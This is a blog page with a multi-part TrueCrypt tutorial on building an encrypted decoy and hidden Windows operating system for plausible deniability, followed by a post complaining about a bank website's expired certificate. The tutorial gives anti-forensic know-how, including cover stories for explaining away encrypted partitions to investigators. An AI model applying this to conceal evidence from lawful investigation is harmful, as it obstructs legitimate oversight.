<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheC1xFKvPLNWXBZgyi3wVfQFfiMKegbBMSfpC7rJiFqMBO76XQfDRT0TkELcFQ7skXNEYLpxAksCnIlR3LqvWH38xfdLgBBscnjAU4qD13nY4JdsgSVbizuAjAfPBiS9w2hzcz9-LoBgI/s1600/021.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheC1xFKvPLNWXBZgyi3wVfQFfiMKegbBMSfpC7rJiFqMBO76XQfDRT0TkELcFQ7skXNEYLpxAksCnIlR3LqvWH38xfdLgBBscnjAU4qD13nY4JdsgSVbizuAjAfPBiS9w2hzcz9-LoBgI/s400/021.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Time
for some mouse fun! TrueCrypt uses your mouse movements within this
dialog to increase the strength of the encryption. Draw some stick
figures. Pretend you are a post modern painter gone wild with their
brush. How long? Oh, maybe 2 minutes? Up to you...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBHTADjfaBbVsec13FOvfO1F9U-JO33QNOJRoQhpB0mxdlvW5Sc57C8jNcl5dxg1OIUwnCsOuvrKgYfoCfEjH-QzUs3TiWjpwLd4EETmyAiJZKJOhNhxNP2nEqmFwA4PwgCbuDmDzD78w/s1600/022.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBHTADjfaBbVsec13FOvfO1F9U-JO33QNOJRoQhpB0mxdlvW5Sc57C8jNcl5dxg1OIUwnCsOuvrKgYfoCfEjH-QzUs3TiWjpwLd4EETmyAiJZKJOhNhxNP2nEqmFwA4PwgCbuDmDzD78w/s400/022.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Okay, the encrypted inner volume on Partition 2 has been created:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirxFEoJ-K0ilVIPMHFjUF1ihhqFcX7kSTQb_2IHIiKHj-sIzHUHufH8OrFhSfdj9-AbnhpLXuQqiujR9PYxpdSnkiTC-hkH9WU1UOP_fdZAu1OvS1XORuQ-VivBRBKj73ohuzRgc8rgBg/s1600/023.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirxFEoJ-K0ilVIPMHFjUF1ihhqFcX7kSTQb_2IHIiKHj-sIzHUHufH8OrFhSfdj9-AbnhpLXuQqiujR9PYxpdSnkiTC-hkH9WU1UOP_fdZAu1OvS1XORuQ-VivBRBKj73ohuzRgc8rgBg/s400/023.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Now
you need to copy the operating system from Partition 1 to the inner
volume of Partition 2. This is going to take place after a reboot from a
TrueCrypt live environment (not Windows). I don't recommend
interrupting it. Click Start.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBvPA2NZPwhBE5z33mwkGXmC2pnXNoMoXzprMHddPJ-F1aiX4pRnaSAzQZRBOF6G_KGWdVjn8glejqNcJwdqhhl0icayS741EiuH_t7Ndq1Sc39b4jX5ZgoybFzJCBQh70kidlWaAY4c8/s1600/024.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBvPA2NZPwhBE5z33mwkGXmC2pnXNoMoXzprMHddPJ-F1aiX4pRnaSAzQZRBOF6G_KGWdVjn8glejqNcJwdqhhl0icayS741EiuH_t7Ndq1Sc39b4jX5ZgoybFzJCBQh70kidlWaAY4c8/s400/024.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Click Yes. </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU6sDbkrgWhfgaTf9eLJIT33MjWOGicyrKMKPx7niQAhKjlXgqeyaPPk9OymdqWasphHaJpy-JlWn4C0-GkzyVRgZYiE2vHDWZrd6M9VTSWMyztlXkC9L1d_t0llEo2Ct8Tcihaj3ogUI/s1600/025.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU6sDbkrgWhfgaTf9eLJIT33MjWOGicyrKMKPx7niQAhKjlXgqeyaPPk9OymdqWasphHaJpy-JlWn4C0-GkzyVRgZYiE2vHDWZrd6M9VTSWMyztlXkC9L1d_t0llEo2Ct8Tcihaj3ogUI/s400/025.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Enter Password B: </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQrhwEnZ2z5YLH5jxCMl65D_aFIn_xT3pWyyHGO1uOyHW6fQgrZnJeqVigJhXNWpjgpZlUa5l2aJVoQLj8Zu3jhIHCtQpbZqzHO-4ZG4b_KbGYNLycdeG7ym1wmzSfoIUs_8QVIK-fgZM/s1600/026.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQrhwEnZ2z5YLH5jxCMl65D_aFIn_xT3pWyyHGO1uOyHW6fQgrZnJeqVigJhXNWpjgpZlUa5l2aJVoQLj8Zu3jhIHCtQpbZqzHO-4ZG4b_KbGYNLycdeG7ym1wmzSfoIUs_8QVIK-fgZM/s400/026.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Go do a little yard work or something: </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMoQmy7qmHsfGz9ZS56VNUs2Qoo8K02jkdBxlkSvARgLUZP3iA_XZc57vjBp9H1-ZQSoASqa8YQ_B_P8CC0SHmCfWibcMof7hh2lpOSOPT8W835jRKxaviyUdpKxum_CMmTJHk5CSuRfU/s1600/027.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMoQmy7qmHsfGz9ZS56VNUs2Qoo8K02jkdBxlkSvARgLUZP3iA_XZc57vjBp9H1-ZQSoASqa8YQ_B_P8CC0SHmCfWibcMof7hh2lpOSOPT8W835jRKxaviyUdpKxum_CMmTJHk5CSuRfU/s400/027.jpg" width="400" /></a></div>
<br />
~Cool! It's done...Enter Password B: <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfpwa5Leet2EzFtpxjyzfgYQdUF6K-wHEtHMNZBo8LCNzAUSCSrn0SH2GkvCSEtB_LWx7fg27VlmfBsaj2Rc-i6qEeXRt35O7b-HwKiVQ1lN82aAbdBu2ftreyNH8nhQ6N7nD8ErioS4/s1600/028.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfpwa5Leet2EzFtpxjyzfgYQdUF6K-wHEtHMNZBo8LCNzAUSCSrn0SH2GkvCSEtB_LWx7fg27VlmfBsaj2Rc-i6qEeXRt35O7b-HwKiVQ1lN82aAbdBu2ftreyNH8nhQ6N7nD8ErioS4/s400/028.jpg" width="400" /></a></div>
<br />
<br />
~So
once you've booted into your hidden operating system, pull up Disk
Management and be freaked out. It looks like you are booted to Partition
1! You're not, don't worry. This is just the behavior of a TrueCrypt
hidden operating system. This next dialogue explains further:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlB03sMmtsGUxDwWKM2VYOyAl-ybbB5bzETv-Jhd7ZNzPK-nIrrU-6KDeO08AybuvyqA9qoXxXBjjqrOAXr3joqLISw7QQwRS-81fdAaRmS1TaX9h5K96X8u7gFMH-6Nosm6yWvHJCXfQ/s1600/029.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlB03sMmtsGUxDwWKM2VYOyAl-ybbB5bzETv-Jhd7ZNzPK-nIrrU-6KDeO08AybuvyqA9qoXxXBjjqrOAXr3joqLISw7QQwRS-81fdAaRmS1TaX9h5K96X8u7gFMH-6Nosm6yWvHJCXfQ/s400/029.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~This
next huge dialog is basically reminding you that you can only write to
encrypted filesystems when booted to the hidden operating system.
Writing to unencrypted filesystems could give away the presence of the
hidden operating system by leaving traces in those filesystems. Down
at the bottom, it tells you how to securely transfer files from the
decoy operating system to the hidden operating system.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb0RHFCRExaIfddRKqmXWqjFbzx4cy6Ms9FLA7fZwttPDFadn-3MmaGx56EXMU-0OwKdMGMjsVDC4EWzaRpIJbLRUmGOx5-mkp_60hiVeMTU9exY-fSnLBUKBU2CDh5RHXyeGiUfWHvJo/s1600/030.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb0RHFCRExaIfddRKqmXWqjFbzx4cy6Ms9FLA7fZwttPDFadn-3MmaGx56EXMU-0OwKdMGMjsVDC4EWzaRpIJbLRUmGOx5-mkp_60hiVeMTU9exY-fSnLBUKBU2CDh5RHXyeGiUfWHvJo/s400/030.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After
you click OK on the window above, the next dialog guides you through
tasks for Partition 1. Hang tight and continue onto Part 3 for that by clicking here.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-3.html"> Click here to go to Part 3 - Setup your first partition</a><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Links to each section:<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html" target="">Part 1</a> - (Un)boring intro with all the snazzy info<br />
Part 2 - Setup your second partition -- you are here<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-3.html">Part 3</a> - Setup your first partition (sounds backwards, I know)<br />
Part 4 - Other cool stuff -- COMING SOON<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-90452000320317875342013-09-05T21:38:00.002-05:002013-09-07T22:54:15.429-05:00Plausible deniability of a hidden OS - Part 1<div>
So just in case you are like a spy or just extremely paranoid,
I've got a post for you on how to create a system with TrueCrypt (free)
that <i>dual boots</i> between an encrypted <i>decoy</i> Windows operating system and an encrypted <i>hidden</i> Windows
operating system. Such a hidden system in theory cannot even be proven to exist by the
best computer forensics investigation techniques in use at the time of
this post. By employing this particular type of encryption, one can
potentially achieve plausible deniability in regards to the presence of a hidden
operating system.</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://imgs.xkcd.com/comics/security.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="http://imgs.xkcd.com/comics/security.png" width="400" /></a> </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Now if you want to find a quick tutorial online on how to do this,
Google will serve you well. There are quite a few. But if you want to fully understand the anatomy and architecture of
this technology and a full explanation of the many confusing
dialog boxes you will encounter during your adventure, this is
place for you. I will strive to explain in detail while still keeping
things as straightforward and simple as possible.</div>
<div>
<br />
This will be in four parts:<br />
Part 1 - (Un)boring intro with all the snazzy info -- you're reading this now!<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-2.html">Part 2</a> - Setup your second partition<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-3.html">Part 3</a> - Setup your first partition (sounds backwards, I know)<br />
Part 4 - Other cool stuff -- COMING SOON<br />
<br /></div>
<div>
So why use a hidden operating system or why even use encryption at all? Well, let's look at your choices...<br />
<br />
<b>1. No encryption at all:</b>
Not good. Anybody can boot your computer into a Linux live CD like
Knoppix or whatever and view all your flat files to their heart's
content. If your laptop is stolen or lost, you are toast.<br />
<br />
<b>2. Encrypt a volume:</b>
You can encrypt a volume on your computer with something like
TrueCrypt. This amounts to a file being created which is actually an
encrypted container for your files. This will protect only the files you
put into it. The container is mounted by simply opening the TrueCrypt
application, mounting the container file and providing the password. Without the
password, no one can see your stuff.<br />
<br />
<b>3. Encrypt a hidden volume:</b>
When setting up #2 (above), you can additionally set up <a href="http://www.truecrypt.org/docs/hidden-volume" target="_blank">an encrypted hidden volume</a> inside of the of the normal encrypted outer volume.
Although someone could forensically deduct that the outer volume exists
and potentially force you to reveal the password, they would not be able
to tell that there was a hidden volume inside of it. Even if they were
familiar with this technology and suspected that there was a hidden
volume, in theory they would not be able to prove forensically that it
existed and you could plausibly deny it's existence. When mounting the
volume, you can use one of 2 passwords: Using one mounts the normal
outer volume; Using the other mounts the hidden volume.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgqPmslDoRDRfu-oqDssWYwzn8h6xHZAAHL54aVCDUGKD-93Y9dEeLWc97w3zVke8W4IX8QGDlIBvjEd_TigwDe0lrP7roagMFlYMFAwhYjJ0XxnRrGKECcs4P55z6YnX1QZiXxIGo6VY/s1600/074.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgqPmslDoRDRfu-oqDssWYwzn8h6xHZAAHL54aVCDUGKD-93Y9dEeLWc97w3zVke8W4IX8QGDlIBvjEd_TigwDe0lrP7roagMFlYMFAwhYjJ0XxnRrGKECcs4P55z6YnX1QZiXxIGo6VY/s400/074.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">A custom fake boot error which is really a TrueCrypt password prompt</td></tr>
</tbody></table>
<br />
<b>4. Encrypt the operating system partition:</b><br />
This
involves encrypting your entire Windows installation so that a password
is required in order to even boot. If someone removes your hard drive
and slaves it into their computer or boots your computer to a live CD,
they will still not be able to recover your data because it is
encrypted. When you boot your computer, a boot loader will come up and
ask for the password before you can boot into Windows. Also, the
bootloader password prompt can be hidden or a fake error can be
displayed in it's place if you really wanna go paranoid. For added
security/paranoia, some even prefer to copy the TrueCrypt bootloader to
external media and then securely wipe it from the hard drive so that
even the best analyst could potentially not prove that there was any encryption in
place at all, even if they suspected it. In this case, the external
media would contain the bootloader but the hard drive itself would
contain no definitive evidence of encryption. A forensic analysis in
that situation would simply show random bits on the disk. That last
part's a little outside of the scope of this post, however, except to say that the presence of random bits on a disk are not evidence enough to definitely prove the existence of encrypted data. Many virtual data shredding applications write random bits when wiping disks, for instance. <br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLuT-_iJdXlo6_DSNm9Jzq5isFZqBlHInLl-dVFcnJ0rmYN7xmCtp5859OQAcndhgq770lJo12QNTUitLbwvu_0Ui1Leh_v9iBYvOSaGvYsw22JjriMXsbC-f8T2UepPdnjwXUxdDLH3U/s1600/adversary.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLuT-_iJdXlo6_DSNm9Jzq5isFZqBlHInLl-dVFcnJ0rmYN7xmCtp5859OQAcndhgq770lJo12QNTUitLbwvu_0Ui1Leh_v9iBYvOSaGvYsw22JjriMXsbC-f8T2UepPdnjwXUxdDLH3U/s400/adversary.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>(click to enlarge)</i></td></tr>
</tbody></table>
<br />
<b>5. Encrypt a hidden operating system:</b>
You can have your computer dual boot to both a decoy operating system
and a <a href="http://www.truecrypt.org/docs/?s=hidden-operating-system" target="_blank">hidden operating system</a>. An attacker theoretically would not be
able to tell that a hidden operating system can even be booted to
because it's totally based on what password you type during boot up. The
password prompt in the bootloader knows to send you to the right
operating system depending on what password is inputed. If you were
forced to provide access to the computer by revealing the password, you
could simply provide the password to the decoy operating system. The
attacker could then boot into the decoy operating system and if they
were savvy, they could see that there was an apparently empty 2nd
partition on your hard drive. If skilled in forensics, they could see
that the 2nd partition was populated with what appears to be random
data. Although theoretically no technology currently exists for them to
prove the presence of a hidden operating system (or that the secondary partition is
even encrypted at all), the presence of this mysterious partition may
cause them to question as to whether there is a hidden operating system.
However, the architecture of the secondary partition is thus that there
is an outer volume and an inner volume, similar to #3 above. The victim
would thus have an additional decoy mechanism by placing fake sensitive
data on the outer volume of the second partition. If questioned about
the presence of random data on the second partition, the victim could
simply claim that they wiped the whole drive to DoD specifications with 3
passes of random data using a <a href="http://www.dban.org/" target="_blank">disk shredding software tool</a>. Still, if they were coerced
(think gun to your head situation) into admitting the presence of
encrypted data on the secondary partition, they could simply provide the
password to the <i>outer volume </i>on the secondary partition and plausibly deny any suggestions that a <i>hidden volume </i>exists
on the secondary partition. (Yes, there are a total of 3 passwords in
this scenario!: One to a decoy operating system on the first partition,
one to an outer volume on second partition and one to an additional
hidden volume on the second partition.) The attacker still could suspect
that there is a hidden operating system and ask you why you put your
data into a secondary partition. You could say that this partition was
so that you could keep your data files separate from your system files,
as many admins do. Or you could say that you wanted to have a separate
level of security for your top secret data. They theoretically would not be able to
prove that the hidden operating system exists. You may be wondering what type of situations this could possibly be useful for. Well, among other scenarios, think of an American spy detained by an unfriendly government who finds themselves a defendant in an espionage case. In this situation, the defendant could potentially be protected by the plausible deniability afforded in this setup.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s640/TC_boot2.png" width="556" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>System bootup in a hidden OS scenario and how all 3 volumes are accessed </i></td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
So to recap, even in the
most secure scenario, they could boot up your computer and suspect that
you have encrypted data but if they forced you to grant access you could
just provide access to the decoy operating system. At that point, if
they also forced you to grant access to the suspected secondary
encrypted partition, you could do so without granting access to the
hidden operating system. If they suspected the presence of a hidden
operating system, in theory you could plausibly deny its existence much
easier than you could deny the existence of the decoy operating system
on the first partition and the outer volume of the secondary partition.
Even in the case of an official government investigation or court case,
there would theoretically be no way to prove beyond a shadow of a doubt
that a hidden operating system is on a given computer. An investigation
involving the best available forensics software publicly known in our time could not
prove it. (The NSA or others <a href="http://www.nytimes.com/2013/09/06/us/nsa-foils-much-internet-encryption.html?_r=0" target="_blank">may have technology that is not known to the public</a>, etc. but <a href="http://www.theregister.co.uk/2010/06/28/brazil_banker_crypto_lock_out/" target="_blank">in multiple cases the government has not been able to successfully decrypt TrueCrypt volumes</a>.) The whole plausible deniability concept here is based on the
idea they can prove the likely existence of the outer volume on the
second parition but they can't prove the existence of the inner volume
on the second partition. What benefit is there to solution #5 above
solution #3 when
they both offer plausible deniability of hidden data? Among other
things, #5 offers that even installed applications and all locally
stored logs and traces of activity would be hidden in the event of a
situation in which the victim is being coerced to provide access or is
in a hostile situation of that nature. (Again, think gun to your head.)<br />
<br />
<br />
A few disclaimers:<br />
<br />
-I'm
not suggesting that you hide things from the government or law
enforcement, etc. There are many situations where this technology could
be used for good or for evil. Please don't use it for evil. Just good.
(Duh.) Also, when I use the term government, keep in mind that there are
good people who may need hide data from evil foreign governments so
don't jump to the conclusion that I am trying to help bad people.<br />
<br />
-With solution #5, you need to boot into the
decoy operating system regularly and use it or the logs will show it
hasn't been used in a while, which could give away the fact that you've
been using a hidden operating system.<br />
<br />
-The computer may be connected to a network (including the Internet) only
when the decoy operating system is running. When the hidden operating
system is running, <a href="http://www.truecrypt.org/docs/?s=hidden-volume-precautions" target="_blank">the computer should not be connected to any network</a>,
including the Internet. Adhering to this is imperative, as the hidden
operating system could be logged on a network, therefore giving away its
existence.<br />
<br />
-It's very hard to maintain a hidden
operating system. It works in theory but is a very difficult setup to
maintain, so watch yourself carefully.<br />
<br />
-None of this
blog post (or anything on this blog, for that matter) are meant as legal
advice. I am not a legal professional, and this post is not intended to
answer your legal questions. (Duh.) <br />
<br />
In my next posts (coming soon), I will be providing instructions on how to setup a hidden operating system. I'm
only going to give you the instructions for #5 (above), as it is the
most challenging and least documented. But the good news is that it's
not that hard, due to the amazing job that the developers have done with
TrueCrypt!<br /><br /><a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-2.html">Click here to go to Part 2 - Setup your second partition</a><br />
<br /> Links to each section:<br /> Part 1 - (Un)boring intro with all the snazzy info -- you're reading this now!<br /> <a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-2.html">Part 2</a> - Setup your second partition<br /> <a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-3.html">Part 3</a> - Setup your first partition (sounds backwards, I know)<br /> Part 4 - Other cool stuff -- COMING SOON</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-6414008497969656432013-09-03T13:16:00.003-05:002013-09-03T21:09:00.775-05:00BancorpSouth's Website is Insecure!<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhksFL2h-Py4Kyx6X91MBY34YkKhFJUqTCUoVf8eej7RXvQWsuRwQSFqeFD7RDVsGtDS40T_i1LeqrndptWunbYbDsHbOpuVTPl1fbtYDv59yOS2ydvfqq6bAuA1Ds5V0fbNHB9WBn4Vns/s1600/bancorpsouth.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhksFL2h-Py4Kyx6X91MBY34YkKhFJUqTCUoVf8eej7RXvQWsuRwQSFqeFD7RDVsGtDS40T_i1LeqrndptWunbYbDsHbOpuVTPl1fbtYDv59yOS2ydvfqq6bAuA1Ds5V0fbNHB9WBn4Vns/s400/bancorpsouth.png" width="400" /></a></div>
<br />
Wow.... I discovered this past weekend that BancorpSouth's website has an expired certificate which expired 8/31/13! (Yes, my system time is set correctly.) At the time I am writing this post (1:16 PM on 9/3/13), all you have to do is go to <a href="http://bancorpsouthonline.com/">bancorpsouthonline.com</a> to see the certificate error. I called them immediately but found that the only line I could call to talk to a live person on the holiday weekend was the credit card fraud line. So I told them of my concern but they did not care. I asked the woman on the phone to transfer me to her supervisor and she made me hold for a long time before coming back and saying that no supervisor was available. She took my number for them to call me back but they never did.<br />
<br />
This morning, I checked and it still has an expired certificate. This is inexcusable for a bank! I also checked their Facebook page and found that while they admitted to being aware of the issue, they were still advising users to login as normal (which requires bypassing the certificate error!) As I'm sure you know, this is horrible. Users should never bypass a certificate warning, but especially not for a bank! This means that users are sending their password across the internet to a non-verified website that could be being redirected to a hacker, for all they know!<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZcspKyO1yxJG8H5RP6LVL_oYzMW5QB3Y3jZ7HnLsQn9dHkMy9pIVAnk8V9NGp6JVhSmwiFE7dgpdi67OArn-bTKdvjiEmS8j_w4fRl49r5lQYRW3tm3Fln0OFFHsWubzZ9ih8Y3ylW0o/s1600/fb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZcspKyO1yxJG8H5RP6LVL_oYzMW5QB3Y3jZ7HnLsQn9dHkMy9pIVAnk8V9NGp6JVhSmwiFE7dgpdi67OArn-bTKdvjiEmS8j_w4fRl49r5lQYRW3tm3Fln0OFFHsWubzZ9ih8Y3ylW0o/s1600/fb.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
I also used an online tool that allows you to verify a website's certificate. It showed the certificate as expired, as well:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikuDqEok7Rtq8WO-vDpCdimBMt_L3ZZaQ3BzFOQw_V6U05S606bsMLE_ahjGH1gqFGfHak3dTE0EWH5-gGBkgEtFRQk6ZX0GyZ3tB0j94W8JseqL5RH41qHbODAaQTx30XauWJImtohfU/s1600/cert.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikuDqEok7Rtq8WO-vDpCdimBMt_L3ZZaQ3BzFOQw_V6U05S606bsMLE_ahjGH1gqFGfHak3dTE0EWH5-gGBkgEtFRQk6ZX0GyZ3tB0j94W8JseqL5RH41qHbODAaQTx30XauWJImtohfU/s400/cert.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Since I have already attempted to contact BancorpSouth and they were dismissive (told me to call back later and talk to customer service after the holiday, etc.), I have been forced to contact the media. Hopefully, the end result of that will be that the average person will be safer by this being exposed. BancorpSouth made two mistakes: 1. Letting the certificate expire was inexcusable for a bank. 2. BancorpSouth should not have advised their customers to go ahead and use the site while the certificate is expired.</div>
<br />
By the way, I want to also mention that their iPad app works just fine still! That is a bad thing!! That means that the app itself may not be even checking the certificate at all! BancorpSouth = FAIL<br />
<br />
<i>UPDATE 1 of 3: BancorpSouth has removed my post and some other negative posts about this issue from their Facebook timeline. Good thing I took screen captures and posted them here before they deleted them! They also blocked me from being able to post to their timeline. So this is how much they care about online privacy? First they fail their customers by making them vulnerable to being hacked, then they lie to them and tell them they are safe...and then lastly they block anyone from seeing the truth. Sorry to inform you BancorpSouth customers but BancorpSouth doesn't care about keeping your money secure. Time for you to find a new bank.</i><br />
<i><br /></i>
<i>Here's what the above thread looked like after they deleted the truth from their Timeline and only preserved the post that made them look good:</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
